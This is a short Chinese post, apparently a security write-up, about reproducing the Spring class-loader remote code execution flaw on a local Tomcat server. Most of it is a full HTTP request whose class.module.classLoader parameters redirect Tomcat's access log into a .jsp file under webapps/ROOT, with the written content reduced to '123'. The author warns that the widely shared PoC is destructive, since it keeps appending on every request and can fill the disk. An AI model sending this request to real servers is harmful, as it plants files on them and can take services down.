我自己本地复现,删除了那个header里面的字段,我就写了123内容来验证
POST / HTTP/1.1
Host: 192.168.188.137:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _dd_s=logs=1&id=420bb100-bc38-485e-9618-9a4aa0f3af20&created=1648615062661&expire=1648615962661
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 416
class.module.classLoader.resources.context.parent.pipeline.first.pattern=123&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=localhost_access_log2&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
别人写Shell的图
注意,第一次POC才可以!!!后面POC无效。
所以第一次POC就要写对。
网传spring 的rce的写文件的poc 是有严重缺陷的,非无损检测。
如果文件写入成功,每次有http请求就会继续在文件追加写入,很容易把磁盘写满,磁盘满了生成服务很容易挂掉。
不要拿着poc就在各种网站上乱打,请了解后果以后再谨慎使用!